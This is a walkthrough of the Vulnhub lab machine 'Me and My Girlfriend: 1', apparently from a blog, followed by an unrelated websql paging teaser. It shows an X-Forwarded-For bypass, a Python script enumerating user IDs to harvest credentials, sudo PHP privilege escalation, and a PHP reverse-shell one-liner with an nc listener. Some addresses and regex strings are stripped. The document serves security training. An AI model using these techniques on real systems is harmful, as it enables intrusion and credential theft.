Vulnhub target – me and my girl friend: 1


Actual combat of vulnhub target

1. Target address,409/

2. First look at the description (requirements)

  • Through this, we can know that we need to find the “thing” hidden by Alice. Maybe it’s flag!!
  • This is a primary difficulty. Our goal is to get two flags. Where are they??? Find it yourself

3. Host, port discovery

When you import the target into VMware or virtual box and start it, you will automatically obtain the IP address. The page is as follows:

Let’s first look at the surviving hosts in the current network:

Because there are many virtual machines in my intranet, it is difficult to distinguish which one is the target. In this case, you can match the corresponding IP address through the MAC address, as shown above
View the target MAC address in virtual machine – > right click Settings – > network adapter – > advanced

Then scan which ports are opened by the target

We can see that ports 80 and 22 are opened, and the services corresponding to each port are as follows:

Reference link:

Port number service
80 HTTP Hypertext Transfer Protocol (HTTP) for World Wide Web (WWW) services
22 SSH secure shell (SSH) service

Opening port 80 indicates that the HTTP service is enabled. Visit the address to view the web service

Sure enough, the discovery request was rejected, suggesting that we can only access it locally. We check the source code and find it for us to usex-forwarded-for

We added x-forwarded-for by capturing packets: successfully accessed

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

We found a sign in box(note that local access needs to be added to each subsequent page request!), we registered an account and logged in and found a profile page followed by a user_ ID parameter, the page directly displays our user name and password.

We tried to modify user_ Id = 1. If you find that someone else’s information is displayed, you might as well write a script to blow up all user names and passwords

Python script: (Python is not good, you can refer to writing your own script!)

import re
import requests

if __name__ == '__main__':
    for user_id in range(1,13):
        burp0_url = f"{user_id}"
        burp0_cookies = {"PHPSESSID": "ft21h9vkiehflhkv1qfago3c75"}
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate", "Connection": "close", "x-forwarded-for": "",
            "Upgrade-Insecure-Requests": "1"}
        requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
        r = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
        username = re.findall(r'',r)
        passwd = re.findall(r'',r)

        if username[0]:
            print(username[0] + ":" + passwd[0])

Remember our description? If you don’t remember, go back and have a look! We found Alice’s account password. Do you remember that port 22 is opened on it? So we can SSH to Alice’s account. When I went in, I found nothing. What I found through LS – Al,.my_secret, there’s a secret folder. Open it and have a look

The first flag was found successfully. Remember that we have two flags in total. Seeing the above prompt, we need to obtain another flag with root permission.

4. Right raising

First, check what commands you can execute with root permission. You can execute PHP commands with root permission, and PHP can execute local commands. Therefore, it is equivalent to Alice can execute root commands.

Bounce shell:

  1. First, listen to port 10086 on Kali

    nc -lvp 10086
  2. Then Alice on the target creates a PHP rebound shell to connect it

    sudo /usr/bin/php -r '$sock=fsockopen("",10086);exec("/bin/bash -i &3 2>&3");'

    Back to Kali, you have logged in to root. After entering, you have a random look as usual and successfully obtained the second flag!!!

Recommended Today

Encapsulating websql (VII) encapsulating paging and query

Although there are many ways of paging now, unlike before, you can only turn by page, but the basic principle is the same. The paging of websql is relatively simple (regardless of performance), because limit can be used. SQL select * from table where xxx order by xxxx limit 0,10 encapsulation /** *Paging to obtain […]